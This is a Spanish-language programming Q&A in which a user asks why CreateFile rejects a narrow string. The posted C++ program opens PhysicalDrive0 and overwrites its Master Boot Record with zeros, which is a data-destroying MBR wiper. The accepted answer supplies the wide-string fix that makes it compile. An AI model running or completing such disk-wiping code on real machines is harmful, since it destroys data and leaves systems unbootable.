# Un argumento de tipo "const char*" no es compatible con un parámetro de tipo "LPCWSTR"

Tags: c++

Estoy intentando desarrollar un programa que se carga el MBR del disco duro (solo con fines de entretenimiento, lo quiero probar en un entorno virtual) pero a la hora de escribir lo que en teoría se supone que es como el PC reconoce el disco duro ("\\.\PhysicalDrive0") me aparece ese error a la hora de compilarlo.

Este es mi código:

```
#include <Windows.h>
#include <iostream>

//Definir el tamaño por defecto que tiene Master Boot Record
#define MBR_SIZE 512

int main() 
{
    DWORD buffer;
    char mbrContent[MBR_SIZE];

    //Vaciar MBR
    ZeroMemory(&mbrContent, sizeof(mbrContent));

    //Acceso al MBR
    HANDLE MasterBootRecord = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | 
        FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL);

    //Vaciar MBR
    WriteFile(MasterBootRecord, mbrContent, 512, &buffer, NULL);

    CloseHandle(MasterBootRecord);
    return EXIT_SUCCESS;
}
```

[image: introducir la descripción de la imagen aquí]

He buscado por ahí pero no he podido encontrar una solución. Así que si alguien me ayuda a hacer funcionar esto lo agradecería mucho.

Comment: [Windows Coding Conventions](https://learn.microsoft.com/en-us/windows/win32/learnwin32/windows-coding-conventions)

Answer (score 4, accepted):

Te has topado con el oscurantismo de Microsoft. ¿Qué es `LPCWSTR`?

[Según MSDN](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/76f10dd8-699d-45e6-a53c-5aefc586da20) no es más que un alias a `const wchar_t *`:

```
typedef const wchar_t* LPCWSTR;
```

Por lo tanto, la cadena `"\\\\.\\PhysicalDrive0"` que es de `char` no podrá asignarse a un puntero a `wchar_t`, puedes solucionar el problema usando un literal de cadena de carácter ancho:

```
HANDLE MasterBootRecord = CreateFile(L"\\\\.\\PhysicalDrive0", ...
//               Caracter ancho ---> ^
```

Answer (score -1):

DWORD dwread = 0;

DWORD dwwrite = 0;

char sBuff[n + 1] = { 0 };

h_Serial=CreateFile(L"COM5",GENERIC_WRITE,0,NULL,CREATE_NEW,FILE_ATTRIBUTE_NORMAL,NULL);

Comment: Pulsa en [edit] y describe cómo este código responde a la pregunta. Lee [answer] y haz el [tour] para conocer el funcionamiento del sitio.